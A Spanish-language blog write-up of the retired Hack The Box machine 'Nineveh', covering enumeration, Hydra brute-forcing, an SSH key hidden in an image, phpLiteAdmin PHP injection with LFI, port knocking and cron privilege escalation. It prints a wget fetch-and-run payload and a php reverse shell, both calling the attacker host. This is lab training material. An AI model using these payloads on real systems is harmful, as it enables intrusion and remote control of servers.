<!DOCTYPE html>
<html lang="es"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.8.0 -->
<title>OSCP Path ~ Nineveh Hack The Box (Necesario VIP) | Pirrandi Blog</title>
<meta name="generator" content="Jekyll v3.9.3" />
<meta property="og:title" content="OSCP Path ~ Nineveh Hack The Box (Necesario VIP)" />
<meta name="author" content="Pirrandi" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="Writeup de la maquina de HackTheBox llamada NINEVEH siguiendo el PATH para el OSCP" />
<meta property="og:description" content="Writeup de la maquina de HackTheBox llamada NINEVEH siguiendo el PATH para el OSCP" />
<link rel="canonical" href="http://localhost:4000/2021/07/12/Nineveh.html" />
<meta property="og:url" content="http://localhost:4000/2021/07/12/Nineveh.html" />
<meta property="og:site_name" content="Pirrandi Blog" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2021-07-12T00:00:00-03:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="OSCP Path ~ Nineveh Hack The Box (Necesario VIP)" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"Pirrandi"},"dateModified":"2021-07-12T00:00:00-03:00","datePublished":"2021-07-12T00:00:00-03:00","description":"Writeup de la maquina de HackTheBox llamada NINEVEH siguiendo el PATH para el OSCP","headline":"OSCP Path ~ Nineveh Hack The Box (Necesario VIP)","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/2021/07/12/Nineveh.html"},"url":"http://localhost:4000/2021/07/12/Nineveh.html"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/css/style.css">
  <link rel="icon" type="image/png" href="/assets/favicon.png" /><link type="application/atom+xml" rel="alternate" href="http://localhost:4000/feed.xml" title="Pirrandi Blog" /></head>
<body><div class="site-header">
  <div class="wrapper">
    <a class="site-title" rel="author" href="/">Pirrandi Blog<b class="command_prompt"></b><b class="blinking_cursor">_</b></a>
    <span class="social_links">
        <a class="color--hover" href=""><i class="fab fa-"></i></a><a class="color--hover" href=""><i class="fab fa-"></i></a><a class="color--hover" href=""><i class="fab fa-"></i></a>
    </span>
  </div>
</div>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        
  <div class="author-box">
    
    
        <img src="" class="author-avatar" alt="Avatar" />
    
Este es mi blog personal sobre Conceptos Hacking Etico // HTB // TryHackMe // Resumenes de Hacking // Herramientas para distintas tareas.

</div>


<div class="post">
  <h1 class="post-title">OSCP Path ~ Nineveh Hack The Box (Necesario VIP)</h1>
  
  <div class="post-tags">
     
      <a class="tag" href="/tag/HTB,/">HTB,</a>
      
      <a class="tag" href="/tag/OSCP/">OSCP</a>
      
      <a class="tag" href="/tag/Path,/">Path,</a>
      
      <a class="tag" href="/tag/Fueza/">Fueza</a>
      
      <a class="tag" href="/tag/Bruta,/">Bruta,</a>
      
      <a class="tag" href="/tag/Hydra,/">Hydra,</a>
      
      <a class="tag" href="/tag/Steganografia,/">Steganografia,</a>
      
      <a class="tag" href="/tag/LFI,/">LFI,</a>
      
      <a class="tag" href="/tag/phpLiteAdmin,/">phpLiteAdmin,</a>
      
      <a class="tag" href="/tag/RCE,/">RCE,</a>
      
      <a class="tag" href="/tag/PortKnocking,/">PortKnocking,</a>
      
      <a class="tag" href="/tag/SSH,/">SSH,</a>
      
      <a class="tag" href="/tag/Chkrootkit,/">Chkrootkit,</a>
      
      <a class="tag" href="/tag/CRON,/">CRON,</a>
      
      <a class="tag" href="/tag/Maquinas/">Maquinas</a>
      
      <a class="tag" href="/tag/Retiradas,/">Retiradas,</a>
      
      <a class="tag" href="/tag/Writeup,/">Writeup,</a>
      
      <a class="tag" href="/tag/Hacking/">Hacking</a>
      
  </div>
  
  <div class="post-date">Published on 12 Jul 2021</div>
  
  <noscript>
    <div class="post-description">Writeup de la maquina de HackTheBox llamada NINEVEH siguiendo el PATH para el OSCP</div>
  </noscript>
  <div id="animated-post-description" class="post-description" style="display: none;"></div>
  
  <h1 id="nineveh--hack-the-box-to-oscp">Nineveh ~ Hack The Box to OSCP</h1>

<p>Realizamos el Primer escaneo con Nmap</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="s2">$" nmap -p- --open -sS --min-rate 4000 -vvv -n -Pn -oG allports 10.10.10.43       "</span>
</code></pre></div></div>
<p>Procedemos con el siguiente escaneo de Nmap</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># nmap -sC -sV -p80,443 10.10.10.43 -oN target                                                                                                                                                                1 ⚙</span>

Starting Nmap 7.91 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2021-07-10 12:31 CEST
Nmap scan report <span class="k">for </span>10.10.10.43
Host is up <span class="o">(</span>0.054s latency<span class="o">)</span><span class="nb">.</span>

PORT    STATE SERVICE  VERSION
80/tcp  open  http     Apache httpd 2.4.18 <span class="o">((</span>Ubuntu<span class="o">))</span>
|_http-server-header: Apache/2.4.18 <span class="o">(</span>Ubuntu<span class="o">)</span>
|_http-title: Site doesn<span class="s1">'t have a title (text/html).
443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn'</span>t have a title <span class="o">(</span>text/html<span class="o">)</span><span class="nb">.</span>
| ssl-cert: Subject: <span class="nv">commonName</span><span class="o">=</span>nineveh.htb/organizationName<span class="o">=</span>HackTheBox Ltd/stateOrProvinceName<span class="o">=</span>Athens/countryName<span class="o">=</span>GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after:  2018-07-01T15:03:30
|_ssl-date: TLS randomness does not represent <span class="nb">time</span>
| tls-alpn: 
|_  http/1.1
</code></pre></div></div>
<p>Encontramos un dominio para meter en nuestro /etc/hosts</p>

<p>Lanzamos el script de <code class="language-plaintext highlighter-rouge">nmap http-enum</code> a nivel web</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PORT   STATE SERVICE
80/tcp open  http
| http-enum: 
|_  /info.php: Possible information file
</code></pre></div></div>
<p>Lanzamos la herramienta <code class="language-plaintext highlighter-rouge">Whatweb</code></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># whatweb http://10.10.10.43                                                                                                                                                                                  1 ⚙</span>
http://10.10.10.43 <span class="o">[</span>200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.18 <span class="o">(</span>Ubuntu<span class="o">)]</span>, IP[10.10.10.43]
</code></pre></div></div>
<p>Probamos a hacer un fuzzing a nivel del dominio web encontrado</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># wfuzz -c -L --hc=404 -t 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt https://nineveh.htb/FUZZ                                                                                  130 ⨯ 1 ⚙</span>
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz<span class="s1">'s documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: https://nineveh.htb/FUZZ
Total requests: 220547

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                                            
=====================================================================

000000835:   200        485 L    974 W      11430 Ch    "db"                                                                                                                                               
000045227:   200        1 L      3 W        49 Ch       "https://nineveh.htb/"                                                                                                                             
000095511:   403        11 L     32 W       300 Ch      "server-status"                                                                                                                                    
000095763:   200        5 L      7 W        71 Ch       "secure_notes"                                                                                                                                     
</span></code></pre></div></div>

<p>Chequeamos la web version http y fuzzeamos como en https a ver si encontramos lo mismo o no.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">*</span> Wfuzz 3.1.0 - The Web Fuzzer                         <span class="k">*</span>
<span class="k">********************************************************</span>

Target: http://10.10.10.43/FUZZ
Total requests: 220547

<span class="o">=====================================================================</span>
ID           Response   Lines    Word       Chars       Payload                                                                                                                                            
<span class="o">=====================================================================</span>

000003008:   200        1 L      3 W        68 Ch       <span class="s2">"department"</span> 
</code></pre></div></div>
<p>Encontramos un login <code class="language-plaintext highlighter-rouge">/department/</code> a nivel de <code class="language-plaintext highlighter-rouge">http://10.10.10.43/</code></p>

<p>En el cual tambien podemos probar a hacer fuerza bruta, y probando usuarios vemos que para el usuario Admin tenemos una respuesta diferente dandonos a entender que el usuario 
admin existe a nivel del loguin web.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-form-post "/department/login.php:username=^USER^&amp;password=^PASS^:Invalid Password\!" -V -t 64</span>

<span class="o">[</span>80][http-post-form] host: 10.10.10.43   login: admin   password: 1q2w3e4r5t
1 of 1 target successfully completed, 1 valid password found
</code></pre></div></div>

<p>A nivel <code class="language-plaintext highlighter-rouge">https://nineveh.htb/</code> encontramos que en la ruta <code class="language-plaintext highlighter-rouge">secure_notes</code> hay una imagen de extension <code class="language-plaintext highlighter-rouge">.php</code>.
Nos la descargamos y miramos a ver si encontramos algo interesante:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Sacamos informacion oculta de la imagen en .png encontrada en la ruta https://nineveh.htb/secure_notes/nineveh.png 

<span class="nt">-----BEGIN</span> RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAri9EUD7bwqbmEsEpIeTr2KGP/wk8YAR0Z4mmvHNJ3UfsAhpI
H9/Bz1abFbrt16vH6/jd8m0urg/Em7d/FJncpPiIH81JbJ0pyTBvIAGNK7PhaQXU
PdT9y0xEEH0apbJkuknP4FH5Zrq0nhoDTa2WxXDcSS1ndt/M8r+eTHx1bVznlBG5
FQq1/wmB65c8bds5tETlacr/15Ofv1A2j+vIdggxNgm8A34xZiP/WV7+7mhgvcnI
3oqwvxCI+VGhQZhoV9Pdj4+D4l023Ub9KyGm40tinCXePsMdY4KOLTR/z+oj4sQT
X+/1/xcl61LADcYk0Sw42bOb+yBEyc1TTq1NEQIDAQABAoIBAFvDbvvPgbr0bjTn
KiI/FbjUtKWpWfNDpYd+TybsnbdD0qPw8JpKKTJv79fs2KxMRVCdlV/IAVWV3QAk
FYDm5gTLIfuPDOV5jq/9Ii38Y0DozRGlDoFcmi/mB92f6s/sQYCarjcBOKDUL58z
GRZtIwb1RDgRAXbwxGoGZQDqeHqaHciGFOugKQJmupo5hXOkfMg/G+Ic0Ij45uoR
JZecF3lx0kx0Ay85DcBkoYRiyn+nNgr/APJBXe9Ibkq4j0lj29V5dT/HSoF17VWo
9odiTBWwwzPVv0i/JEGc6sXUD0mXevoQIA9SkZ2OJXO8JoaQcRz628dOdukG6Utu
Bato3bkCgYEA5w2Hfp2Ayol24bDejSDj1Rjk6REn5D8TuELQ0cffPujZ4szXW5Kb
ujOUscFgZf2P+70UnaceCCAPNYmsaSVSCM0KCJQt5klY2DLWNUaCU3OEpREIWkyl
1tXMOZ/T5fV8RQAZrj1BMxl+/UiV0IIbgF07sPqSA/uNXwx2cLCkhucCgYEAwP3b
vCMuW7qAc9K1Amz3+6dfa9bngtMjpr+wb+IP5UKMuh1mwcHWKjFIF8zI8CY0Iakx
DdhOa4x+0MQEtKXtgaADuHh+NGCltTLLckfEAMNGQHfBgWgBRS8EjXJ4e55hFV89
P+6+1FXXA1r/Dt/zIYN3Vtgo28mNNyK7rCr/pUcCgYEAgHMDCp7hRLfbQWkksGzC
fGuUhwWkmb1/ZwauNJHbSIwG5ZFfgGcm8ANQ/Ok2gDzQ2PCrD2Iizf2UtvzMvr+i
tYXXuCE4yzenjrnkYEXMmjw0V9f6PskxwRemq7pxAPzSk0GVBUrEfnYEJSc/MmXC
iEBMuPz0RAaK93ZkOg3Zya0CgYBYbPhdP5FiHhX0+7pMHjmRaKLj+lehLbTMFlB1
MxMtbEymigonBPVn56Ssovv+bMK+GZOMUGu+A2WnqeiuDMjB99s8jpjkztOeLmPh
PNilsNNjfnt/G3RZiq1/Uc+6dFrvO/AIdw+goqQduXfcDOiNlnr7o5c0/Shi9tse
i6UOyQKBgCgvck5Z1iLrY1qO5iZ3uVr4pqXHyG8ThrsTffkSVrBKHTmsXgtRhHoc
il6RYzQV/2ULgUBfAwdZDNtGxbu5oIUB938TCaLsHFDK6mSTbvB/DywYYScAWwF7
fw4LVXdQMjNJC3sn3JaqY1zJkE4jXlZeNQvCx4ZadtdJD9iO+EUG
<span class="nt">-----END</span> RSA PRIVATE KEY-----


ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCuL0RQPtvCpuYSwSkh5OvYoY/
/CTxgBHRniaa8c0ndR+wCGkgf38HPVpsVuu3Xq8fr+N3ybS6uD8Sbt38Umdyk+IgfzUlsnSnJMG8gAY0rs+FpBdQ91P3LTEQQfRqlsmS6Sc
/gUflmurSeGgNNrZbFcNxJLWd238zyv55MfHVtXOeUEbkVCrX
/CYHrlzxt2zm0ROVpyv/Xk5+/UDaP68h2CDE2CbwDfjFmI/9ZXv7uaGC9ycjeirC
/EIj5UaFBmGhX092Pj4PiXTbdRv0rIabjS2KcJd4+wx1jgo4tNH/P6iPixBNf7
/X/FyXrUsANxiTRLDjZs5v7IETJzVNOrU0R
amrois@nineveh.htb
</code></pre></div></div>
<p>Y encontramos al posible usuario con el que conectarnos con esta clave privada de SSH
<code class="language-plaintext highlighter-rouge">amrois</code></p>

<p>Guardamos la clave ssh privada encontrada con permisos 600 y hacemos memoria, ya que en los servicios abiertos no veiamos ningun servicio ssh abierto en la maquina.</p>

<p>Proseguimos por otra via enumerando el directorio o ruta <code class="language-plaintext highlighter-rouge">/db/</code>
Encontramos algo interesante en /db/</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>phpLiteAdmin v1.9

Warning:  rand<span class="o">()</span> expects parameter 2 to be integer, float given <span class="k">in</span> /var/www/ssl/db/index.php on line 114
</code></pre></div></div>
<p>Probamos a hacer fuerza bruta con <code class="language-plaintext highlighter-rouge">HYDRA</code>:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="c"># hydra -l none -P /usr/share/wordlists/rockyou.txt 10.10.10.43 httpS-form-post "/db/index.php:password=^PASS^&amp;remember=yes&amp;login=Log+In&amp;proc_login=true:Incorrect password." -V </span>
 
 <span class="o">[</span>443][http-post-form] host: 10.10.10.43   login: none   <span class="s2">"password: password123"</span>
</code></pre></div></div>
<p>Buscamos por searchsploit:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># searchsploit phpLiteAdmin 1.9</span>
<span class="nt">----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------</span> <span class="nt">---------------------------------</span>
 Exploit Title                                                                                                                                                                    |  Path
<span class="nt">----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------</span> <span class="nt">---------------------------------</span>
PHPLiteAdmin 1.9.3 - Remote PHP Code Injection                                                                                                                                    | php/webapps/24044.txt
phpLiteAdmin 1.9.6 - Multiple Vulnerabilities                                                                                                                                     | php/webapps/39714.txt
<span class="nt">----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------</span> <span class="nt">---------------------------------</span>
</code></pre></div></div>

<p>Conseguimos acceder al servicio <code class="language-plaintext highlighter-rouge">phpLiteAdmin</code></p>

<p>Y leyendo la vulnerabilidad encontrada en la version 1.9.3 vemos que <code class="language-plaintext highlighter-rouge">creando una nueva Base de Datos</code> con <code class="language-plaintext highlighter-rouge">extension .php</code> podemos inyectar una nueva tabla que almacene una cadena tipo TXT en donde podemos <code class="language-plaintext highlighter-rouge">meterle un codigo php malicioso</code></p>

<p>Creamos una nueva base de datos con <code class="language-plaintext highlighter-rouge">extension .php</code> en <code class="language-plaintext highlighter-rouge">phpLiteAdmin</code> ruta: <code class="language-plaintext highlighter-rouge">https://nineveh.htb/db/index.php?switchdb=%2Fvar%2Ftmp%2FninevehNotes.php</code></p>

<p>Nombre de la BD creada <code class="language-plaintext highlighter-rouge">ninevehNotes.php</code> le agregamos un campo <code class="language-plaintext highlighter-rouge">“shell” 1 de valor</code>,  despues llamamos <code class="language-plaintext highlighter-rouge">shell a la tabla</code>,  tipe <code class="language-plaintext highlighter-rouge">TXT</code> y le metemos el comando malicioso en php en la opcion <code class="language-plaintext highlighter-rouge">default Value</code> para que se ejecute al final.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt;?php system<span class="o">(</span><span class="s2">"wget http://10.10.14.12/shell.txt -O /tmp/shell.php; php /tmp/shell.php"</span><span class="o">)</span><span class="p">;</span> ?&gt;
</code></pre></div></div>

<p>Credenciales Obtenidas hasta el momento:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Para phpLiteAdmin: password123
Para login en Https /department/: 
User: admin 
Password: 1q2w3e4r5t
</code></pre></div></div>
<p>Entramos a la web HTTP con las credenciales y descubrimos que existe un LFI en la ruta</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://10.10.10.43/department/manage.php?notes<span class="o">=</span>/var/tmp/ninevehNotes.php
</code></pre></div></div>
<p>Habiendo creado nuestra nueva base de datos con nuestro codigo malicioso en php probamos a apuntar desde el LFI.
Apuntamos a la ruta <code class="language-plaintext highlighter-rouge">/var/tmp/ninevehNotes.php</code></p>

<p>Habiendo puesto un servidor en escucha almacentando nuestra <code class="language-plaintext highlighter-rouge">“Reverse_Shell_PHP”</code> → <code class="language-plaintext highlighter-rouge">'shell.txt'</code> para que se nos envie una conexion reversa cuando se ejecute por el puerto <code class="language-plaintext highlighter-rouge">1234</code></p>

<p>Montamos un servidor con python3 para postear la <code class="language-plaintext highlighter-rouge">shell.txt</code> y subirla al servidor victima.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># python3 -m http.server 80                                                                </span>
Serving HTTP on 0.0.0.0 port 80 <span class="o">(</span>http://0.0.0.0:80/<span class="o">)</span> ...
10.10.10.43 - - <span class="o">[</span>12/Jul/2021 16:27:05] <span class="s2">"GET /shell.txt HTTP/1.1"</span> 200 -
</code></pre></div></div>

<p>Obtenemos Acceso desde nuestra session a la escucha por el puerto <code class="language-plaintext highlighter-rouge">1234</code></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># nc -nlvp 1234</span>
listening on <span class="o">[</span>any] 1234 ...
connect to <span class="o">[</span>10.10.14.12] from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.43] 54202
Linux nineveh 4.4.0-62-generic <span class="c">#83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux</span>
 15:54:35 up 28 min,  0 <span class="nb">users</span>,  load average: 0.02, 0.06, 0.07
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
<span class="nv">uid</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span>
/bin/sh: 0: can<span class="s1">'t access tty; job control turned off
$ whoami
www-data
</span></code></pre></div></div>
<h1 id="escalada-de-privilegios-de-www-data-a-amrois">Escalada de Privilegios de www-data a amrois</h1>
<ul>
  <li>PORTKNOCKING</li>
</ul>

<p>Hay un proceso de <code class="language-plaintext highlighter-rouge">portKnocking o golpes TCP UDP para abrir un servicio</code> 
Miramos por los procesos ejecutados a nivel de root en el sistema.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">#ps -aux </span>
root      1309  1.1  0.2   8756  2224 ?        Ss   06:47   0:40 /usr/sbin/knock
</code></pre></div></div>

<p>Nos movemos a buscar el fichero de configuracion de <code class="language-plaintext highlighter-rouge">nockd.conf</code></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>www-data@nineveh:/etc<span class="nv">$ </span><span class="nb">cat </span>knockd.conf
<span class="o">[</span>options]
 logfile <span class="o">=</span> /var/log/knockd.log
 interface <span class="o">=</span> ens160

<span class="o">[</span>openSSH]
 sequence <span class="o">=</span> 571, 290, 911 
 seq_timeout <span class="o">=</span> 5
 start_command <span class="o">=</span> /sbin/iptables <span class="nt">-I</span> INPUT <span class="nt">-s</span> %IP% <span class="nt">-p</span> tcp <span class="nt">--dport</span> 22 <span class="nt">-j</span> ACCEPT
 tcpflags <span class="o">=</span> syn

<span class="o">[</span>closeSSH]
 sequence <span class="o">=</span> 911,290,571
 seq_timeout <span class="o">=</span> 5
 start_command <span class="o">=</span> /sbin/iptables <span class="nt">-D</span> INPUT <span class="nt">-s</span> %IP% <span class="nt">-p</span> tcp <span class="nt">--dport</span> 22 <span class="nt">-j</span> ACCEPT
 tcpflags <span class="o">=</span> syn
</code></pre></div></div>

<p>Desde nuestro pc attackante: hacemos lo siguiente para golpear los puertos y que se abra el servicio SSH</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># for x in 571 290 911; do nmap -Pn --max-retries 0 -p $x 10.10.10.43; done</span>
Host discovery disabled <span class="o">(</span><span class="nt">-Pn</span><span class="o">)</span><span class="nb">.</span> All addresses will be marked <span class="s1">'up'</span> and scan <span class="nb">times </span>will be slower.
Starting Nmap 7.91 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2021-07-12 17:09 CEST
Warning: 10.10.10.43 giving up on port because retransmission cap hit <span class="o">(</span>0<span class="o">)</span><span class="nb">.</span>
Nmap scan report <span class="k">for </span>nineveh.htb <span class="o">(</span>10.10.10.43<span class="o">)</span>
Host is up.

PORT    STATE    SERVICE
571/tcp filtered umeter

Nmap <span class="k">done</span>: 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>1.44 seconds
Host discovery disabled <span class="o">(</span><span class="nt">-Pn</span><span class="o">)</span><span class="nb">.</span> All addresses will be marked <span class="s1">'up'</span> and scan <span class="nb">times </span>will be slower.
Starting Nmap 7.91 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2021-07-12 17:09 CEST
Warning: 10.10.10.43 giving up on port because retransmission cap hit <span class="o">(</span>0<span class="o">)</span><span class="nb">.</span>
Nmap scan report <span class="k">for </span>nineveh.htb <span class="o">(</span>10.10.10.43<span class="o">)</span>
Host is up.

PORT    STATE    SERVICE
290/tcp filtered unknown

Nmap <span class="k">done</span>: 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>1.16 seconds
Host discovery disabled <span class="o">(</span><span class="nt">-Pn</span><span class="o">)</span><span class="nb">.</span> All addresses will be marked <span class="s1">'up'</span> and scan <span class="nb">times </span>will be slower.
Starting Nmap 7.91 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2021-07-12 17:09 CEST
Warning: 10.10.10.43 giving up on port because retransmission cap hit <span class="o">(</span>0<span class="o">)</span><span class="nb">.</span>
Nmap scan report <span class="k">for </span>nineveh.htb <span class="o">(</span>10.10.10.43<span class="o">)</span>
Host is up.

PORT    STATE    SERVICE
911/tcp filtered xact-backup

Nmap <span class="k">done</span>: 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>1.20 seconds
</code></pre></div></div>
<p>Acto seguido nos conectamos por SSH con la clave ID_RSA con premisos 600</p>

<p>usamos la clave id_rsa encontrada en la foto .png</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># ssh -i id_rsa amrois@nineveh.htb</span>
The authenticity of host <span class="s1">'nineveh.htb (10.10.10.43)'</span> can<span class="s1">'t be established.
ECDSA key fingerprint is SHA256:aWXPsULnr55BcRUl/zX0n4gfJy5fg29KkuvnADFyMvk.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '</span>nineveh.htb,10.10.10.43<span class="s1">' (ECDSA) to the list of known hosts.
Ubuntu 16.04.2 LTS
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

288 packages can be updated.
207 updates are security updates.


You have mail.
Last login: Mon Jul  3 00:19:59 2017 from 192.168.0.14
amrois@nineveh:~$ ls
user.txt
amrois@nineveh:~$ cat user.txt 
42a4d28xxxxxxxxxxxxxxxxxxxxxxxxx
amrois@nineveh:~$ 
</span></code></pre></div></div>
<h1 id="enumeracion-para-escalar-privilegios-a-root">Enumeracion para escalar privilegios a ROOT</h1>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>amrois@nineveh:~<span class="nv">$ </span>crontab <span class="nt">-l</span>
<span class="c"># Edit this file to introduce tasks to be run by cron.</span>
<span class="c"># Each task to run has to be defined through a single line</span>
<span class="c"># indicating with different fields when the task will be run</span>
<span class="c"># and what command to run for the task</span>
<span class="c"># </span>
<span class="c"># To define the time you can provide concrete values for                                                                                                                                                            </span>
<span class="c"># minute (m), hour (h), day of month (dom), month (mon),                                                                                                                                                            </span>
<span class="c"># and day of week (dow) or use '*' in these fields (for 'any').#                                                                                                                                                    </span>
<span class="c"># Notice that tasks will be started based on the cron's system                                                                                                                                                      </span>
<span class="c"># daemon's notion of time and timezones.                                                                                                                                                                            </span>
<span class="c"># Output of the crontab jobs (including errors) is sent through</span>
<span class="c"># email to the user the crontab file belongs to (unless redirected).</span>
<span class="c"># </span>
<span class="c"># For example, you can run a backup of all your user accounts</span>
<span class="c"># at 5 a.m every week with:</span>
<span class="c"># 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/</span>
<span class="c"># </span>
<span class="c"># For more information see the manual pages of crontab(5) and cron(8)</span>
<span class="c"># </span>
<span class="c"># m h  dom mon dow   command</span>
<span class="k">*</span>/10 <span class="k">*</span> <span class="k">*</span> <span class="k">*</span> <span class="k">*</span> /usr/sbin/report-reset.sh
</code></pre></div></div>
<p>Ahi tenemos una tarea CRON que tira de este script que esta creado por nosotros</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">-rwxr-x---</span> 1 amrois amrois 34 Jul  2  2017 /usr/sbin/report-reset.sh
</code></pre></div></div>
<p>Creamos un archivo en la ruta <code class="language-plaintext highlighter-rouge">/tmp/UPDATE</code></p>

<p>Creamos el <code class="language-plaintext highlighter-rouge">archivo UPDATE</code> en <code class="language-plaintext highlighter-rouge">tmp</code> para que se ejecute con la <code class="language-plaintext highlighter-rouge">tarea CRON</code> que esta ejecutando <code class="language-plaintext highlighter-rouge">/usr/sbin/report-reset.sh</code>
<code class="language-plaintext highlighter-rouge">R-shell</code> en php</p>
<pre><code class="language-Bash"># Archivo Update
php -r '$sock=fsockopen("10.10.14.12",443);exec("/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3");'  
</code></pre>
<p>Le asignamos los privilegios de ejecucion para que <code class="language-plaintext highlighter-rouge">root</code> pueda ejecutarlo:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>amrois@nineveh:/tmp<span class="nv">$ </span><span class="nb">chmod</span> +x update
amrois@nineveh:/tmp<span class="nv">$ </span>/usr/sbin/report-reset.sh
</code></pre></div></div>

<p>Nos ponemos a la escucha con una session de <code class="language-plaintext highlighter-rouge">nc -vlnp 443</code>y recibimos la <code class="language-plaintext highlighter-rouge">R-shell cuando se ejecute la tarea </code>CRON`</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># nc -nlvp 443                                                                                                                                                                   </span>
listening on <span class="o">[</span>any] 443 ...
connect to <span class="o">[</span>10.10.14.12] from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.43] 58308
/bin/sh: 0: can<span class="s1">'t access tty; job control turned off
# whoami
root
# 
2a7156085834f2fe318exxxxxxxxxxf3e6a5
</span></code></pre></div></div>

</div>


<div class="comments">
<div id="disqus_thread"></div>
<script>
 var disqus_config = function () {
     this.page.url = 'http://localhost:4000/2021/07/12/Nineveh.html';
     this.page.identifier = '/2021/07/12/Nineveh';
     this.page.title = 'OSCP Path ~ Nineveh Hack The Box (Necesario VIP)';
 };

 (function() {  // REQUIRED CONFIGURATION VARIABLE: EDIT THE SHORTNAME BELOW
     var d = document, s = d.createElement('script');

     s.src = '//bitbrain-github-io.disqus.com/embed.js';

     s.setAttribute('data-timestamp', +new Date());
     (d.head || d.body).appendChild(s);
 })();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript" rel="nofollow">comments powered by Disqus.</a></noscript>

</div>




<div class="related">
  <h2>related posts</h2>
  <ul class="related-posts">
    
      <li>
        <h3>
          <a href="/2023/09/29/Buff-Bof.html">
            Maquina  Retirada Buff de Hack The Box (Necesario VIP)
          </a>
        </h3>
      </li>
    
      <li>
        <h3>
          <a href="/2022/06/05/Search-AD.html">
            Maquina Retirada Search de Hack The Box (Necesario VIP)
          </a>
        </h3>
      </li>
    
      <li>
        <h3>
          <a href="/2022/06/05/Attacktive-THM-AD.html">
            Maquina Retirada Search de Hack The Box (Necesario VIP)
          </a>
        </h3>
      </li>
    
  </ul>
</div>




  
  <h2>all tags</h2>
